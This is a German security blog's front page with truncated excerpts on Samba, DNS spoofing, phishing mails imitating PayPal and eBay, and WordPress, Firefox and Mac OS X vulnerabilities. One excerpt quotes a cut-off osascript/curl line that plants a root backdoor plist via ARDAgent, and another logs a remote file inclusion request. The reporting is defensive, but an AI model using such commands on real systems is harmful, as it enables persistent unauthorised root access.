Heute habe ich versucht Samba beizubringen, dass man auf Shares ohne Passwort zugreifen kann. Dabei hat sich herausgestellt, dass man bei security nicht user sondern share einstellen muss. Pro Share kann mann dann mit der Option guest ok steuern, ob man mit oder ohne Passwort auf das Share zugreifen möchte. Nach der Umstellung konnte jedoch [...]
Das grundsätzliche Problem bei DNS ist, dass sich die Antworten auf Anfragen prinzipiell fälschen lassen. Deshalb verwenden aktuelle Systeme für jede Anfrage eine zufällig gewählte 16-bittige Transaktions-ID. Nur wenn die Antwort diese ebenfalls enthält, kommt sie vom richtigen Server; die Chance, dass ein Angreifer sie errät, ist vernachlässigbar klein. Amit Klein hat allerdings bereits mehrfach [...]
Wie auf heise.de zu lesen ist sind die aktuellen Versionen von Mac OS X (10.4 und 10.5) anfällig für einen Root-Exploit. Auf Slashdot wurde dazu auch bereits ein Vorschlag gepostet, wie man das für eine Backdoor ausnutzen könnte. Die Zeile osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist [...]
Das WordPress Team hat eine neue Version von WordPress freigegeben. Die neue Version enthält einige Bugfixes (es sollen 70 sein), sowie Performanz-Verbesserungen. Nebenbei wird auch eine Sicherheitslücke geschlossen von der es bald einen öffentlichen Exploit geben soll. Aktuell soll dieser noch nicht öffentlich sein. Es wird jedem Betreiber geraten diese neue Version so schnell wie [...]
Wie immer wird man auch bei dieser eMail dazu aufgefordert sich durch klicken auf einen Link mit seinen persönlichen Daten anzumelden. Der Header der eMail kommt diesmal so daher: Message-Id: <200803100712.m2A7Ci8R002000@mail.yhti.net> Reply-To: <no-reply@paypall.com> From: “PayPal”<acc-security@paypall.com> Subject: Security issue. Date: Mon, 10 Mar 2008 01:39:22 -0600 MIME-Version: 1.0 Content-Type: text/html; charset=”Windows-1251″ Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: [...]
Es gibt die neue Version vom Firefox zum download. Die Version behebt einige Schwachstellen darunter auch welche die als kritisch eingestuft wurden. Im Changelog werden die Änderungen aufgeführt.
Gerade wurde WordPress in der Version 2.3.3 erschienen. Diese Version beinhaltet einige Bugfixes und ein Securityfix der die Datei xmlrpc.php betrifft. Wer nur diese Datei fixen möchte bekommt hier die Anleitung. Ansonsten kann das neue Release wie immer hier geladen werden.
Aktuell geht eine Phishing-Email rum, die sich ausgibt von ebay zu sein. Absender und Sebject setzen sich wie folgt zusammen: From: “eBay”<service@ebay.com> Subject: eBay – Security Measures die Email an sich ist im reinen HTML geschrieben und beinhaltet einen Link. Nach außen erweckt er den Anschein als wolle man auf ebay zugreifen: http://www.ebay.com/colappmgr/colportal/[...]page_logonform In Wirklichkeit [...]
Es ist mal wieder so weit. Es gibt eine SQL Injection. Aktuell soll es noch keinen Patch geben. Evtl. kann aber dieses hier helfen. Ansonsten hilft ein eingeschalteter ModSecurity. Update: Hm, der Patch bringt es nicht so wirklich. Angeblich soll die Injection nun doch nicht mehr so das Problem sein. Ein installiertes ModSecurity macht es [...]
Aktuell gibt es eine Sicherheitslücke in BackUpWordPress und passend dazu einen Exploit (Nur für Tests verwenden). Eine gefixt Version gibt es hier und diese sollte auch schnell eingespielt werden, denn die Skript Kiddies sind wieder unterwegs. Zumindest wenn man sich die Auswertung des Logs von ModSecurity: Request: www.blogator.de 209.216.249.194 – - [02/Nov/2007:10:57:55 +0100] “GET /plugins/BackUp/Archive.php?bkpwp_plugin_path= [...]
 |  |  | |||||||||||||||||||||||||||||||||||||||
Feed abonnieren
Twitter: konqui
blogator.de basiert auf
WordPress.
Einträge (RSS)
und Kommentar(RSS).
Copyright 2007-2010 by Rainer Wiener
Stat: 101 Queries in 0.522 Sekunden.
